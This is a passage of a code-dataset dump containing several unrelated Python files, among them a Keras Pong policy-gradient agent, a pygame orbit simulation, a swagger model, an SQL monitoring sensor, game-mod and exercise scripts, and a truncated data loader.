Conv2D\n\nimport tensorflow as tf\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=config) \n\ndef prepro(o,image_size=[80,80]):\n \"\"\"\n Call this function to preprocess RGB image to grayscale image if necessary\n This preprocessing code is from\n https://github.com/hiwonjoon/tf-a3c-gpu/blob/master/async_agent.py\n \n Input: \n RGB image: np.array\n RGB screen of game, shape: (210, 160, 3)\n Default return: np.array \n Grayscale image, shape: (80, 80, 1)\n \n \"\"\"\n y = 0.2126 * o[:, :, 0] + 0.7152 * o[:, :, 1] + 0.0722 * o[:, :, 2]\n y = y.astype(np.uint8)\n resized = scipy.misc.imresize(y, image_size)\n return np.expand_dims(resized.astype(np.float32),axis=2)\n\ndef preprocess_frame(I):\n I = I[35:195] # crop\n #I = I[::2, ::2, 0] # downsample by factor 2\n I = 0.2126 * I[::2, ::2, 0] + 0.7152 * I[::2, ::2, 1] + 0.0722 * I[::2, ::2, 2]\n I[I == 144] = 0 # remove bg\n I[I == 109] = 0\n #I[I != 0] = 1\n return np.expand_dims(I.astype(np.float),axis=0)\n\nclass Agent_PG(Agent):\n def __init__(self, env, args):\n \"\"\"\n Initialize every things you need here.\n For example: building your model\n \"\"\"\n\n super(Agent_PG,self).__init__(env)\n\n ##################\n # YOUR CODE HERE #\n ##################\n self.env = env\n self.state_size = [1, 80, 80]\n self.action_size = env.get_action_space().n\n self.gamma = 0.99\n self.learning_rate = 0.001\n self.states = []\n self.gradients = []\n self.rewards = []\n self.probabilities = []\n self.scores = []\n #self.model = self._build_model()\n if args.test_pg:\n #you can load your model here\n print('loading trained model')\n self.model = keras.models.load_model('./save_model/pong.h5')\n else:\n self.model = self._build_model()\n self.model.save('./save_model/pong.h5')\n self.model.summary()\n\n\n def _build_model(self):\n model = Sequential()\n model.add(Reshape((1,80,80),input_shape=(1,80,80))) # wrong\n # add more conv2d v0.1.1\n model.add(Conv2D(16, (8, 8), kernel_initializer=\"he_uniform\", strides=(4,4), activation=\"relu\", padding=\"same\"))\n model.add(Conv2D(32, (4, 4), kernel_initializer=\"he_uniform\", activation=\"relu\", padding=\"same\", strides=(2, 2)))\n model.add(Flatten())\n model.add(Dense(128, kernel_initializer=\"he_uniform\", activation=\"relu\"))\n #model.add(Dense(32, kernel_initializer=\"he_uniform\", activation=\"relu\"))\n print(self.action_size)\n model.add(Dense(self.action_size, activation='softmax'))\n optimizer = RMSprop(lr=1e-4, rho=0.9)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer)\n return model\n\n def init_game_setting(self):\n \"\"\"\n\n Testing function will call this function at the begining of new game\n Put anything you want to initialize if necessary\n\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n self.prev_x = None\n\n def get_action(self, state):\n state = state.reshape([1, state.shape[0], state.shape[1], state.shape[2]])\n aprob = self.model.predict(state, batch_size=1).flatten()\n self.probabilities.append(aprob)\n prob = aprob / np.sum(aprob)\n action = np.random.choice(self.action_size, 1, p=prob)[0]\n return action, prob\n\n def remember(self, state, action, prob, reward):\n y = np.zeros([self.action_size])\n y[action] = 1\n self.gradients.append(np.array(y).astype('float32') - prob)\n self.states.append(state)\n self.rewards.append(reward)\n\n def discount_rewards(self, rewards):\n discounted_rewards = np.zeros_like(rewards)\n running_add = 0\n for t in reversed(range(0, rewards.size)):\n if rewards[t] != 0:\n running_add = 0\n running_add = running_add * self.gamma + rewards[t]\n discounted_rewards[t] = running_add\n return discounted_rewards\n\n def pg_one(self):\n gradients = np.vstack(self.gradients)\n rewards = np.vstack(self.rewards)\n rewards = self.discount_rewards(rewards)\n rewards = rewards / np.std(rewards - np.mean(rewards))\n gradients *= rewards\n X = np.vstack([self.states])\n Y = self.probabilities + self.learning_rate * np.squeeze(np.vstack([gradients]))\n self.model.train_on_batch(X, Y)\n self.states, self.probabilities, self.gradients, self.rewards = [], [], [], []\n\n def train(self):\n \"\"\"\n Implement your training algorithm here\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n done = False\n running_reward = None\n episode = 0\n score = 0\n #self.model = keras.models.load_model('./save_model/pong.h5')\n prev_x = None\n state = self.env.reset()\n\n while True:\n cur_x = preprocess_frame(state)\n x = cur_x - prev_x if prev_x is not None else np.zeros([1, 80, 80])\n prev_x = cur_x\n\n action, prob = self.get_action(x)\n state, reward, done, info = self.env.step(action)\n score += reward\n self.remember(x, action, prob, reward)\n if(done):\n episode +=1\n self.pg_one()\n print('Episode: %d - Score: %f.' % (episode, score))\n running_reward = score if running_reward is None else running_reward * 0.99 + score * 0.01\n print('resetting env. running mean: %f' % (running_reward))\n state = self.env.reset()\n self.scores.append(score)\n score = 0\n prev_x = None\n self.model.save('./save_model/pong.h5')\n if running_reward > 3:\n break\n #plt.figure()\n #plt.plot(range(episode), self.scores)\n #plt.savefig('pong.png')\n npy = np.asarray(self.scores)\n np.save('scores.npy', npy)\n\n def make_action(self, observation, test=True):\n \"\"\"\n Return predicted action of your agent\n\n Input:\n observation: np.array\n current RGB screen of game, shape: (210, 160, 3)\n\n Return:\n action: int\n the predicted action from trained model\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n cur_x = preprocess_frame(observation)\n x = cur_x - self.prev_x if self.prev_x is not None else np.zeros([1, 80, 80])\n self.prev_x = cur_x\n #state = x.reshape([1, x.shape[0]])\n state = x.reshape([1, x.shape[0], x.shape[1], x.shape[2]])\n action_prob = self.model.predict(state, batch_size=1).flatten()\n # self.probs.append(action_prob)\n prob = action_prob / np.sum(action_prob)\n action = np.random.choice(self.action_size, 1, p=prob)[0]\n return action\n # return self.env.get_random_action()\n\n","sub_path":"hw3/agent_dir/agent_pg.py","file_name":"agent_pg.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"547291094","text":"from spacesim import SpaceSim\nfrom spaceobject import SpaceObject\n\nfrom pygameinterface import PygameInterface\n\n\nsun = SpaceObject(\n name ='sun',\n mass = 1.99e+30,\n radius = 6.96e+8,\n pos = (0,0),\n vel = (0,0),\n color = (255, 255, 0),\n)\n \nearth = SpaceObject(\n name ='earth',\n mass = 5.98e+24,\n radius = 6.37e+6,\n pos = (-1.5e+11, 0),\n vel = (0, 29.8e+8),\n color = (0, 100, 255),\n)\n\n\nmoon = SpaceObject(\n name ='moon',\n mass = 7.36e+22,\n radius = 1.74e+6,\n pos = (-1.5e+11 + 3.82e+8, 0),\n vel = (0, 29.8e+8 + 990 ),\n color = (220, 220, 220),\n)\n \nSpaceObjects = [earth, moon, sun]\n\ninterface = PygameInterface(\n window_size = (1100, 800),\n camera_center = (0, 0),\n camera_zoom = .000000001,\n camera_zoom_step = .9,\n camera_scroll_step = 200,\n\n)\n\n\nsim = SpaceSim(\n SpaceObjects = SpaceObjects, \n G = 1,\n maxstep = 1e+40,\n interface=interface\n)\n\nsim.run()\n\n","sub_path":"earthsunmoon.py","file_name":"earthsunmoon.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"385051395","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom crawler.models.base_model_ import Model\nfrom crawler import util\n\n\nclass Failure(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n \"\"\"Failure - a model defined in Swagger\n\n :param error_message: The error_message of this Failure. # noqa: E501\n :type error_message: str\n :param error_code: The error_code of this Failure. # noqa: E501\n :type error_code: int\n \"\"\"\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code\n\n @classmethod\n def from_dict(cls, dikt) -> 'Failure':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Failure of this Failure. # noqa: E501\n :rtype: Failure\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def error_message(self) -> str:\n \"\"\"Gets the error_message of this Failure.\n\n\n :return: The error_message of this Failure.\n :rtype: str\n \"\"\"\n return self._error_message\n\n @error_message.setter\n def error_message(self, error_message: str):\n \"\"\"Sets the error_message of this Failure.\n\n\n :param error_message: The error_message of this Failure.\n :type error_message: str\n \"\"\"\n\n self._error_message = error_message\n\n @property\n def error_code(self) -> int:\n \"\"\"Gets the error_code of this Failure.\n\n\n :return: The error_code of this Failure.\n :rtype: int\n \"\"\"\n return self._error_code\n\n @error_code.setter\n def error_code(self, error_code: int):\n \"\"\"Sets the error_code of this Failure.\n\n\n :param error_code: The error_code of this Failure.\n :type error_code: int\n \"\"\"\n\n self._error_code = error_code\n","sub_path":"crawler/models/failure.py","file_name":"failure.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"560916139","text":"import os\nimport shutil\nimport tempfile\nimport json\n\nfrom unittest import TestCase\nfrom IPython import embed\n\ndef skip_if(expr):\n def decorator(method):\n @wraps(method)\n def inner(self):\n should_skip = expr() if callable(expr) else expr\n if not should_skip:\n return method(self)\n elif VERBOSITY > 1:\n print('Skipping %s test.' % method.__name__)\n return inner\n return decorator\n\n\ndef skip_unless(expr):\n return skip_if((lambda: not expr()) if callable(expr) else not expr)\n\n\ndef skip_case_if(expr):\n def decorator(klass):\n should_skip = expr() if callable(expr) else expr\n if not should_skip:\n return klass\n elif VERBOSITY > 1:\n print('Skipping %s test.' % klass.__name__)\n class Dummy(object): pass\n return Dummy\n return decorator\n\n\ndef skip_case_unless(expr):\n return skip_case_if((lambda: not expr()) if callable(expr) else not expr)\n\ntest_files_dir = os.path.abspath(os.path.join(__file__, '../gen3_test_files'))\nefi_network_path = os.path.join(test_files_dir, 'network_1393')\n\ndefault_train_settings = {'dataset_path': os.path.join(test_files_dir, 'unstable_training_gen3_4D_nions0_flat_filter8.h5.1'),\n 'drop_outlier_above': 0.999,\n 'drop_outlier_below': 0.001,\n 'hidden_neurons': [16, 16],\n 'hidden_activation': ['tanh', 'tanh'],\n 'drop_chance': 0.0,\n 'output_activation': 'none',\n 'standardization': 'normsm_1_0',\n 'calc_standardization_on_nonzero': True,\n 'goodness_only_on_unstable': True,\n 'goodness': 'mse',\n 'cost_l2_scale': 8e-06,\n 'cost_l1_scale': 0.0,\n 'cost_stable_positive_scale': 0.0,\n 'cost_stable_positive_offset': -5.0,\n 'cost_stable_positive_function': \"block\",\n 'early_stop_after': 15,\n 'early_stop_measure': 'loss',\n 'minibatches': 10,\n 'weight_init': 'normsm_1_0',\n 'bias_init': 'normsm_1_0',\n 'validation_fraction': 0.05,\n 'test_fraction': 0.05,\n 'dtype': 'float32',\n 'optimizer': 'adam',\n 'learning_rate': 0.001,\n 'lbfgs_maxfun': 1000,\n 'lbfgs_maxiter': 15000,\n 'lbfgs_maxls': 20,\n 'adam_beta1': 0.9,\n 'adam_beta2': 0.999,\n 'adadelta_rho': 0.95,\n 'rmsprop_decay': 0.9,\n 'rmsprop_momentum': 0.0,\n 'max_epoch': 1,\n 'steps_per_report': None,\n 'epochs_per_report': None,\n 'save_checkpoint_networks': None,\n 'save_best_networks': None,\n 'track_training_time': None,\n 'train_dims': ['efiITG_GB']}\n","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"611843517","text":"'''\nAuthor: Puffrora\nDate: 2020-12-08 17:47:48\nLastModifiedBy: Puffrora\nLastEditTime: 2020-12-08 17:58:02\n'''\n\n\n'''\n可以转换为 寻找一个数组中相邻元素差为 1 连续子数组的总个数\n注意此题中 z 与 a 是特例\n'''\nclass Solution:\n def findSubstringInWraproundString(self, p):\n\n from collections import defaultdict\n\n # ! 细节处理\n p = '#' + p\n \n # ! 记录以当前字母结尾的且符合题意的连续数组个数\n window = 1\n\n # ! key 是字母, value 是长度 记录以 key 结尾的最长连续子串的长度\n len_mapper = defaultdict(int)\n \n for i in range(1, len(p)):\n if ord(p[i]) - ord(p[i-1]) in [1, -25]:\n window += 1\n else:\n window = 1\n \n # ! 只用记录以 key 结尾的长连续子串的最长长度 避免重复 如 'cac'\n len_mapper[p[i]] = max(len_mapper[p[i]], window)\n\n return sum(len_mapper.values())\n\n\n","sub_path":"Leetcode/leetcode467 环绕字符串中唯一的子字符串.py","file_name":"leetcode467 环绕字符串中唯一的子字符串.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"586105779","text":"# This script controls weapon firing on a ship and if needed decreases the current crew count...\n\n# by Sov\n\n# Imports\nimport App\nfrom Custom.DS9FX.DS9FXLib import DS9FXLifeSupportLib\nfrom Custom.DS9FX.DS9FXLifeSupport import LifeSupport_dict, HandlePlugins\nfrom Custom.DS9FX.DS9FXEventManager import DS9FXGlobalEvents\n\n# Functions\ndef HandleWeaponsFire(pObject, pEvent): \n pHit = pEvent.IsHullHit()\n if not pHit == 1:\n return 0 \n\n pDamage = pEvent.GetDamage()\n if pDamage <= 0:\n return 0\n\n pShip = App.ShipClass_Cast(pEvent.GetDestination())\n if not pShip:\n return 0\n \n pShipID = pShip.GetObjID()\n if not pShipID:\n return 0\n \n pHullMax = pShip.GetHull().GetMaxCondition()\n if not pHullMax:\n return 0\n\n if not LifeSupport_dict.dCrew.has_key(pShipID):\n return 0\n\n fShieldStats = DS9FXLifeSupportLib.GetShieldPerc(pShip)\n if fShieldStats > 25:\n return 0\n\n pTechStats = HandlePlugins.RetriveStatus(pObject, pEvent)\n if not pTechStats:\n return 0\n\n # To calculate properly we need the defined max crew value, not the current one...\n pShipType = DS9FXLifeSupportLib.GetShipType(pShip)\n if not pShipType:\n return 0\n\n fMaxCrew = DS9FXLifeSupportLib.GetShipMaxCrewCount(pShip, pShipType)\n if not fMaxCrew:\n return 0\n\n fModifier = float(pDamage)/float(pHullMax)\n fModifier = float(fModifier)*float(fMaxCrew)\n iModifier = int(fModifier)\n\n iNewCrew = LifeSupport_dict.dCrew[pShipID]\n iNewCrew = iNewCrew - iModifier\n if iNewCrew <= 0:\n iNewCrew = 0\n pShip.ClearAI()\n DS9FXLifeSupportLib.GroupCheck(pShip)\n DS9FXLifeSupportLib.PlayerCheck(pShipID)\n DS9FXGlobalEvents.Trigger_Ship_Dead_In_Space(pShip)\n\n LifeSupport_dict.dCrew[pShipID] = iNewCrew\n\n DS9FXGlobalEvents.Trigger_Combat_Effectiveness(pShip)\n","sub_path":"scripts/Custom/DS9FX/DS9FXLifeSupport/HandleWeaponHit.py","file_name":"HandleWeaponHit.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"383717106","text":"# Problem 1\r\n# 1'den 1000'e kadar olan sayılardan mükemmel -->prosedurde yok \r\n# sayı olanları ekrana yazınız\r\n# Bunun için bir sayının mükemmel \r\n# olup olmadığını dönen bir tane fonksiyon yazın.\r\n\r\n# Bir sayının bölenlerinin toplamı \r\n# kendine eşitse bu sayı mükemmel bir sayıdır.\r\n# Örnek olarak 6 mükemmel bir sayıdır (1 + 2 + 3 = 6).\r\n\r\n\r\ndef muk(sayi):\r\n top=0\r\n for i in range(1,sayi):\r\n if sayi%i==0:\r\n top=+1\r\n return sayi==top\r\n\r\n\r\n\r\nfor i in range(1,1001):\r\n if muk(i):\r\n print(\"mukemmel\",i)\r\n","sub_path":"Fonksiyonlar/hw-1.py","file_name":"hw-1.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"299973383","text":"#Create two empty lists\nnumbers = list()\nwords = list()\n\n#Get five values from user and sort them\nwhile len(numbers) + len(words) < 5:\n userData = input(\"Enter an integer or word: \")\n if userData.isdigit():\n numbers.append(userData)\n else:\n words.append(userData)\n\n#Print out the data organized by numeric values then others. \nprint (\"\\nThe numbers you entered were: {}\\nThe words you entered were: {}\".format(numbers, words))\n\n#Print out all the data as a single string\nprint (\"All the data you entered was: {}\\n\".format(', '.join(numbers + words)))\n\n","sub_path":"LessonEleven/listDataTypes.py","file_name":"listDataTypes.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"150612364","text":"if __name__ == '__main__':\n from cottages import cottage\nelse:\n from .cottages import cottage\n\n\n\n \ndef menu(MENU, cottage1):\n print(\"------------------------------\")\n print(\"You are welcome in \"+cottage1.name)\n for i, item in enumerate(MENU):\n print(\"{0:2}. {1}\".format(i, item[0]))\n print(\"------------------------------\")\n return int(input())\n\ndef startMenu():\n try:\n cottage1 = cottage()\n MENU = [\n ['Add house', cottage1.addHouse],\n ['Output house(s)', cottage1.outputHouse],\n ['Change house', cottage1.changeHouse],\n ['Read cottage from file', cottage1.readFromFile],\n ['Write cottage to file', cottage1.writeToFile],\n ['Clear cottage', cottage1.clearCottage]\n ]\n while True:\n MENU[menu(MENU, cottage1)][1]()\n except Exception as ex:\n print(ex, \"\\nbye\")","sub_path":"asm1905/st02/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"160705331","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCheck connection with SQL database.\n'''\nimport timeit\n\nfrom whmonit.client.sensors import TaskSensorBase\n\n\nclass Sensor(TaskSensorBase):\n '''\n Check SQL sensor class.\n\n Sent results:\n * result: the rows returned by executing query separated by commas\n * timeit: time it took to execute query (it includes time spent on\n sending and receiving data from the server)\n\n As for returned error messages: there is a great number of SQL errors\n and they're never precise. What's more, different drivers may raise\n different errors in the same situations.\n Also, be careful using sqlite as for example connecting to non-existent\n database creates the file instead of causing error.\n\n This sensor returns either error while connecting (including timeout) or\n executing query.\n The errors generally might be:\n * DBAPI errors as returned by the database - they come in form\n (Type)message, OperationalError seems to be most common, for full list\n see http://legacy.python.org/dev/peps/pep-0249/#exceptions\n * StatementError - any kind of wrong statement (including DBAPI errors)\n * several others included in SQLAlchemyError like CompileError,\n ArgumentError, ResourceClosedError\n\n Drivers used: psycopg2, mysql-python, cx_oracle, pyodbc (mssql)\n\n Those drivers will usually require client to be installed on the machine in\n order to install them (oracle is non-free, mysql requires package\n libmysqlclient-dev). Message about lack of driver is sent through\n error stream.\n '''\n\n name = 'check_sql'\n streams = {\n 'result': {\n 'type': str,\n 'description': 'Query result.',\n },\n 'result_num': {\n 'type': float,\n 'description': 'Query result numeric.',\n },\n 'query_time': {\n 'type': float,\n 'description': 'Time taken to execute the query.',\n },\n }\n\n # TODO #1671: Better way for getting raw config\n config_raw = config_schema = {\n '$schema': 'http://json-schema.org/schema#',\n 'type': 'object',\n 'properties': {\n 'dbtype': {\n 'type': 'string',\n 'enum': ['postgresql', 'mysql', 'oracle', 'mssql', 'sqlite']\n },\n 'host': {\n 'type': 'string',\n 'default': '',\n 'description': 'Server address. '\n 'Can be IP, hostname, socket or sqlite file.'\n },\n 'port': {\n 'type': 'integer',\n 'minimum': 1,\n 'maximum': 65535,\n 'description': 'Port to the server. Defaults to driver default.'\n },\n 'username': {\n 'type': 'string',\n 'description': 'Database username. '\n 'Not necessary for unix domain socket.'\n },\n 'password': {\n 'type': 'string',\n 'description': 'Database password. '\n 'Not necessary for unix domain socket.'\n },\n 'database': {\n 'type': 'string',\n 'description': 'Name of the database.'\n },\n 'query': {\n 'type': 'string',\n 'description': 'SQL query to send to database.'\n }\n },\n 'required': ['dbtype', 'host', 'query'],\n 'additionalProperties': False\n }\n\n def do_run(self):\n # R0914: Too many local variables.\n # pylint: disable=R0914\n\n import sqlalchemy\n from sqlalchemy import exc\n from sqlalchemy.event import listen\n from sqlalchemy.engine.url import URL\n\n def start_query(conn, *dummy):\n ''' Save time the query starts. '''\n conn.info['wh_time'] = timeit.default_timer()\n\n def end_query(conn, *dummy):\n ''' Save time the query's finished. '''\n conn.info['wh_time'] = timeit.default_timer() - conn.info['wh_time']\n\n config = {\n k: v for k, v in self.config.iteritems()\n if k in self.config_raw['properties'].keys()\n }\n config['drivername'] = config.pop('dbtype')\n\n if config['drivername'] == 'sqlite':\n config['database'] = config.pop('host')\n\n query = config.pop('query')\n\n url = URL(**config)\n\n try:\n engine = sqlalchemy.create_engine(url)\n except ImportError as err:\n return ((\n 'error',\n '{}. Sensor checking sql requires it. Please install it.'\n .format(err)\n ),)\n\n error_msg = (\n '(database {})\\nError: {{}}\\n Message from database: \"{{}}\"'\n .format(url.__to_string__())\n )\n try:\n connection = engine.connect()\n except exc.TimeoutError:\n return (\n ('error', error_msg.format('Timeout getting connection', None)),\n )\n except exc.SQLAlchemyError as err:\n return (\n ('error', error_msg.format('Could not connect to database', err)),\n )\n\n listen(connection, 'before_cursor_execute', start_query)\n listen(connection, 'after_cursor_execute', end_query)\n try:\n result = connection.execute(query).fetchall()\n time = connection.info['wh_time']\n except exc.StatementError as err:\n return ((\n 'error', error_msg.format(\n 'Error executing statement {}'.format(err.statement), err)\n ),)\n except exc.SQLAlchemyError as err:\n return ((\n 'error', error_msg.format(\n 'Error executing statement, your query: {}'.format(\n self.config['query']),\n err.message)\n ),)\n finally:\n connection.close()\n\n try:\n if len(result) == 1 and len(result[0]) == 1:\n result = ('result_num', float(result[0][0]))\n else:\n raise ValueError\n except ValueError:\n result = ('result', str(result)[1:-1])\n\n return (result, ('query_time', time))\n","sub_path":"whmonit/client/sensors/check_sql/linux_01.py","file_name":"linux_01.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"311264820","text":"def posi(N,r,c): #전체를 기준으로 몇 사분면에 위치하는지 반환(1사분면 : 0, 2사분면 : 1 ...)\n if r < 2**(N-1):\n if c <2**(N-1):\n return 0\n else:\n return 1\n elif c <2**(N-1):\n return 2\n else:\n return 3\ndef lastnrc(N,r,c):#전 단계(2^N-1)에서는 N,r,c가 몇 인지를 튜플로 반환.\n p = posi(N,r,c)\n if p==0:\n return(N-1,r,c)\n elif p == 1:\n return(N-1,r,c-2**(N-1))\n elif p == 2:\n return(N-1,r-2**(N-1),c)\n elif p == 3:\n return(N-1,r-2**(N-1),c-2**(N-1))\ndef find(tup):\n if tup[0] == 1:\n return posi(tup[0],tup[1],tup[2])\n last_ans = find(lastnrc(tup[0],tup[1],tup[2]))\n return last_ans + (2**(2*tup[0]-2))*posi(tup[0],tup[1],tup[2])\n\nN, r, c = map(int, input().split())\n\nprint(find((N,r,c)))","sub_path":"junhee/divide_conquer/Z_1074.py","file_name":"Z_1074.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"94249001","text":"import os \nimport pickle\nimport numpy as np \nfrom keras.preprocessing.sequence import pad_sequences\n#import torch\nfrom gensim.models import Word2Vec\nfrom keras.utils.np_utils import to_categorical\nfrom nltk.corpus import stopwords\n\n\nclass Data_Loader():\n\tdef __init__(self, batch_size, domain, emb_size):\n\t\tself.batch_size = batch_size\n\t\t# self.sent_len = sent_len\n\t\t# self.maxlen = maxlen\n\t\t# fr = open('data.pkl', 'rb')\n\t\t# fr = open('data_cat_laptop.pkl', 'rb')\n\t\tself.domain = domain \n\t\tif domain == 'rest':\n\t\t\tdata_file = './pkl/data_rest_2016_2.pkl'\n\t\t\t# data_file = 'data_rest.pkl'\n\t\telse:\n\t\t\tdata_file='./pkl/data_laptop_2014.pkl'\n\t\t\t# data_file = 'data_cat_laptop.pkl'\n\t\tfr = open(data_file, 'rb')\n\t\tdata = pickle.load(fr)\n\n\t\tself.word2idx = data['word2idx']\n\t\tself.idx2word = data['idx2word']\n\n\t\tself.clabel2idx = data['clabel2idx']\n\t\tself.idx2clabel = data['idx2clabel']\n\n\n\t\tself.vocab_size = data['vocab_size']\n\t\t# self.emb_size = data['emb_size']\n\n\t\t# self.label_mask = data['label_mask']\n\n\n\t\tself.num_tag = len(data['tag2idx'])+1\n\n\t\tself.num_cat = data['num_cat']\n\t\tself.clabels = data['cat_labels']\n\t\t# self.clabels = to_categorical(self.clabels, self.num_cat)\n\t\tself.clabels = self.my_categorical(self.clabels, self.num_cat)\n\t\t# self.clabel_mask = self.get_cat_mask(self.clabels, data['clabel2idx'])\n\n\n\t\t\n\n\n\n\t\t# self.emb_size = 100\n\t\t# self.gen_size = 100\n\t\tself.emb_size = emb_size\n\t\tself.gen_size = emb_size\n\n\t\tself.psent \t= data['processed_sentence']\n\t\tself.rsent \t= data['raw_sentence']\n\t\tlabels \t\t= data['labels']\n\t\ttags = data['tags']\n\n\n\t\t# sentences, tags, labels \t= self.filter_stopwords(self.psent, tags, labels, data['idx2word'])\n\t\tsentences = self.psent\n\n\t\ttfidf \t\t= self.my_tfidf(sentences, self.clabels)\n\n\t\t\n\t\t# labels = self.get_label_from_file('./data/sent_annot.txt')\n\t\tassert len(labels) == len(sentences)\n\n\t\t# self.maxlen = max([len(sent) for sent in sentences])\n\t\t# self.maxlen = int(np.mean([len(sent) for sent in sentences]))\n\t\tself.maxlen = 36\n\n\t\t\n\t\t# sentences = pad_sequences(sentences,self.maxlen, padding='post')\n\n\t\t# tags = data['tags']\n\t\t# tags = pad_sequences(tags, self.maxlen, padding='post')\n\n\n\n\t\t# print(labels)\n\t\tself.emb_mat = self.embed_mat()\n\t\tself.gen_mat = self.genel_mat()\n\n\n\t\tself.labels \t= pad_sequences(labels, self.maxlen)\n\n\t\tself.sent \t\t= pad_sequences(sentences, self.maxlen)\n\n\t\tself.tfidf \t\t= pad_sequences(tfidf, self.maxlen)\n\n\t\t# self.sent_tag \t= to_categorical(pad_sequences(tags, self.maxlen), self.num_tag)\n\t\tself.sent_tag = pad_sequences(tags, self.maxlen)\n\n\t\tself.mask \t\t= np.ones((len(self.sent), self.maxlen))\n\n\t\tself.mask[self.sent==0] = 0\n\t\tself.pointer = 0\n\n\n\t\tself.data_size = len(self.sent)\n\n\t\t# if 'permutation' not in data:\n\t\t# \tself.permutation = np.random.permutation(self.data_size)\n\t\t# \tdata['permutation'] = self.permutation\n\t\t# \tpickle.dump(data,open(data_file, 'wb'))\n\t\t# else:\n\t\t# \tself.permutation = data['permutation']\n\n\t\tself.permutation = np.arange(self.data_size)\n\n\t\t# self.train_val_test() ## it splits training testing here\n\t\tself.train_test_split(self.permutation) ## it splits training testing here\n\n\tdef my_tfidf(self, sents, clabels):\n\t\tclabel2sent = {}\n\t\tword2sent = {}\n\n\t\tfor i,sent in enumerate(sents):\n\t\t\tfor token in sent:\n\t\t\t\tif token not in word2sent:\n\t\t\t\t\tword2sent[token] = [i]\n\t\t\t\telif i not in word2sent[token]:\n\t\t\t\t\tword2sent[token].append(i)\n\t\t\tfor clabel in clabels[i]:\n\t\t\t\tif clabel not in clabel2sent:\n\t\t\t\t\tclabel2sent[clabel] = [i]\n\t\t\t\telse:\n\t\t\t\t\tclabel2sent[clabel].append(i)\n\n\t\ttfidf = []\n\t\tfor sent in sents:\n\t\t\tfrom collections import Counter\n\t\t\t# print(sent)\n\t\t\tcounter = Counter(sent)\n\t\t\ttemp_tfidf = []\n\t\t\tfor token in sent:\n\t\t\t\ttf = counter[token]\n\t\t\t\tidf = np.log(len(sents)*1.0/len(word2sent[token])+1)\n\t\t\t\ttemp_tfidf.append(tf*idf)\n\t\t\ttfidf.append(temp_tfidf)\n\t\treturn tfidf\n\n\n\n\n\tdef filter_stopwords(self, sentences, tags, labels, idx2word):\n\t\timport string\n\t\tascii_ = [c for c in string.ascii_lowercase]\n\t\tstop = stopwords.words('english')\n\t\tto_filter = ascii_+stop\n\n\t\tres_sent = []\n\t\tres_tags = []\n\t\tres_label= []\n\t\tfor sentence, tag, label in zip(sentences,tags,labels):\n\t\t\ttemp_sent = []\n\t\t\ttemp_tags = []\n\t\t\ttemp_label= []\n\t\t\tfor i,token in enumerate(sentence):\n\t\t\t\tif idx2word[token] in to_filter:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttemp_sent.append(token)\n\t\t\t\t\ttemp_tags.append(tag[i])\n\t\t\t\t\ttemp_label.append(label[i])\n\t\t\tres_sent.append(temp_sent)\n\t\t\tres_tags.append(temp_tags)\n\t\t\tres_label.append(temp_label)\n\t\t\t# temp = [token for token in sentence if idx2word[token] not in to_filter]\n\t\t\t# sent.append(temp)\n\t\treturn res_sent, res_tags, res_label\n\n\t\t\n\tdef get_cat_mask(self, clabels, clabel2idx):\n\t\tcat_mask = []\n\t\tindex = clabel2idx['unknown']\n\t\tfor clabel in clabels:\n\t\t\tif len(clabel)==0 and clabel[0]==index:\n\t\t\t\tcat_mask.append(0)\n\t\t\telse:\n\t\t\t\tcat_mask.append(1)\n\t\treturn np.array(cat_mask, dtype = np.float32)\n\n\tdef my_categorical(self, labels, num_class):\n\t\tres = []\n\t\tfor label in labels:\n\t\t\ttemp = np.zeros(num_class)\n\t\t\ttemp[label] = 1\n\t\t\tres.append(temp)\n\t\treturn np.array(res,dtype = np.float32)\n\t\t# return res.astype(np.float32)\n\n\t\t# print(self.train_size)\n\tdef get_label_from_file(self,filename):\n\t\tfr = open(filename)\n\t\tdata = fr.readlines()\n\t\tfr.close()\n\t\tlabels = []\n\t\tfor i in 